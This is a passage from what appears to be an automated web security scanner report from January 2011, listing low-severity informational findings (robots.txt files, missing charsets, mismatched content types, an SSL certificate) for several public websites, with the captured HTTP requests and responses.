GET /robots.txt HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Sat, 08 Jan 2011 12:34:39 GMT
ETag: "733d-d0-49954f559bd07"
Content-Type: text/plain; charset=ISO-8859-1
Date: Wed, 12 Jan 2011 15:26:34 GMT
Content-Length: 208
Connection: close
Set-Cookie: dcenv=ndc; path=/; domain=walmart.com

#go away
User-agent: *
Sitemap: http://www.walmart.com/Sitemap_Index.xml
Sitemap: http://www.walmart.com/EndecaBrowse_Sitemap_Index.xml
# Disallow the following URLs
Disallow: /solutions
Disallow: /cs
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.1 200 OK
Server: Web Server
Date: Wed, 12 Jan 2011 15:26:41 GMT
Content-type: text/plain
Last-modified: Tue, 30 Nov 2010 16:48:15 GMT
Content-length: 3093
Etag: "c15-4cf52acf"
Accept-ranges: bytes
Connection: close

User-agent: ia_archiver
Disallow: /

Sitemap: http://www.washingtonpost.com/sitemap_index.xml

User-agent: *
Crawl-delay: 1
Disallow: /cgi-bin/
Disallow: /ac2/wp-dyn/admin/search/google
Disallow: /wp-
...[SNIP]...

20.10. http://www.websitedescription.com/msn.whitepages.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.websitedescription.com
Path:	/msn.whitepages.com

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.websitedescription.com

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:26:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Thu, 08 Jul 2010 05:39:18 GMT
ETag: "2660c1d-18-48ad9b51dad80"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

21. HTML does not specify charset previous next
There are 6 instances of this issue:

http://ad.doubleclick.net/clk
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://www.pwc.com/WTS/WebTrendsServlet.js
http://www.tukui.org/v2/forums/search/
http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354
http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

21.1. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Wed, 12 Jan 2011 03:24:50 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

21.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 2868

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

21.3. http://www.pwc.com/WTS/WebTrendsServlet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/WTS/WebTrendsServlet.js

Request

GET /WTS/WebTrendsServlet.js?id=us&locale=en_US HTTP/1.1
Host: www.pwc.com
Proxy-Connection: keep-alive
Referer: http://www.pwc.com/us/en/index.jhtml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LD.previous.visitor.us.pwc.com=true

Response

21.4. http://www.tukui.org/v2/forums/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tukui.org
Path:	/v2/forums/search/

Request

GET /v2/forums/search/ HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:58:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 28 Apr 2010 08:13:38 GMT
ETag: "95e247-56-4854796527080"
Accept-Ranges: bytes
Content-Length: 86
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<body onload="window.location.replace('http://www.tukui.org/v2/forums/search.php')">

21.5. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Wed, 12 Jan 2011 15:26:43 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Wed, 12 Jan 2011 15:26:41 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

22. Content type incorrectly stated previous next
There are 20 instances of this issue:

http://ad.doubleclick.net/clk
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://darkblue.com/skins/lander/images/darkblue.ico
http://www.pwc.com/WTS/WebTrendsServlet.js
http://www.sentinelinvestments.com/favicon.ico
http://www.wired.com/js/ads/google_customize.js
http://www.wired.com/js/cn-fe-ads/cn.ad.lotame.js
http://www.wired.com/js/cn-fe-ads/cn.dart.js
http://www.wired.com/js/cn-fe-common/cn.js
http://www.wired.com/js/comments/commentBroker.js
http://www.wired.com/js/comments/prototype.js
http://www.wired.com/js/ecom/ecomfw.min.js
http://www.wired.com/js/global.js
http://www.wired.com/js/jquery-1.3.2.min.js
http://www.wired.com/js/omniture/s_code.js
http://www.wired.com/js/videos/MobileCompatibility.js
http://www.wired.com/js_blogs/json2.js
http://www.wired.com/js_blogs/popup.js
http://www.wired.com/threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js
http://www.wired.com/threatlevel/xmlrpc.php

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

22.1. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Wed, 12 Jan 2011 03:24:50 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

22.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 2868

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

22.3. http://darkblue.com/skins/lander/images/darkblue.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://darkblue.com
Path:	/skins/lander/images/darkblue.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /skins/lander/images/darkblue.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: darkblue.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 03:05:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 01 Feb 2010 01:57:09 GMT
ETag: "698b62-47e-4d8f6740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................aJE.M2-.M2-.M2-.M2-.M2-.M2-.M2-.M2-.M2-.M2-.M2-.M2-.M2-.M2-.nXT.O4..O4..O4..O4..O4..O4..O4..O4..O4..O4..O4..O4..O4..O4..O4..O4..R60.R60.R6
...[SNIP]...

22.4. http://www.pwc.com/WTS/WebTrendsServlet.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pwc.com
Path:	/WTS/WebTrendsServlet.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

22.5. http://www.sentinelinvestments.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sentinelinvestments.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.sentinelinvestments.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 14:07:25 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 13 Oct 2009 16:54:28 GMT
ETag: "6a8031-d6e-e63ab900"
Accept-Ranges: bytes
Content-Length: 3438
Content-Type: text/plain; charset=UTF-8

............ .h...6......... .h............. .h.... ..(....... ..... ..........................e...b...b...[...[...[...[...[...b...e...e...b...[...[...[...e...e...[...o ...l...............g..l...[...[
...[SNIP]...

22.6. http://www.wired.com/js/ads/google_customize.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/ads/google_customize.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/ads/google_customize.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.7. http://www.wired.com/js/cn-fe-ads/cn.ad.lotame.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/cn-fe-ads/cn.ad.lotame.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /js/cn-fe-ads/cn.ad.lotame.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.8. http://www.wired.com/js/cn-fe-ads/cn.dart.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/cn-fe-ads/cn.dart.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /js/cn-fe-ads/cn.dart.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.9. http://www.wired.com/js/cn-fe-common/cn.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/cn-fe-common/cn.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/cn-fe-common/cn.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.10. http://www.wired.com/js/comments/commentBroker.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/comments/commentBroker.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/comments/commentBroker.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.11. http://www.wired.com/js/comments/prototype.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/comments/prototype.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/comments/prototype.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.12. http://www.wired.com/js/ecom/ecomfw.min.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/ecom/ecomfw.min.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /js/ecom/ecomfw.min.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.13. http://www.wired.com/js/global.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/global.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

22.14. http://www.wired.com/js/jquery-1.3.2.min.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/jquery-1.3.2.min.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/jquery-1.3.2.min.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.15. http://www.wired.com/js/omniture/s_code.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/omniture/s_code.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/omniture/s_code.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.16. http://www.wired.com/js/videos/MobileCompatibility.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js/videos/MobileCompatibility.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

22.17. http://www.wired.com/js_blogs/json2.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js_blogs/json2.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /js_blogs/json2.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.18. http://www.wired.com/js_blogs/popup.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/js_blogs/popup.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js_blogs/popup.js HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

22.19. http://www.wired.com/threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:12:31 GMT
Date: Wed, 12 Jan 2011 05:02:31 GMT
Content-Length: 9027
Connection: close

/*
Shutter Reloaded for NextGEN Gallery
http://www.laptoptips.ca/javascripts/shutter-reloaded/
Version: 1.3.1
Copyright (C) 2007-2008 Andrew Ozz
Released under the GPL, http://www.gnu.org/copyle
...[SNIP]...

22.20. http://www.wired.com/threatlevel/xmlrpc.php previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wired.com
Path:	/threatlevel/xmlrpc.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /threatlevel/xmlrpc.php HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Tue, 11 Jan 2011 23:15:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 05:10:04 GMT
Date: Wed, 12 Jan 2011 05:02:04 GMT
Content-Length: 114
Connection: close

XML-RPC server accepts POST requests only.

23. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://edit.yahoo.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

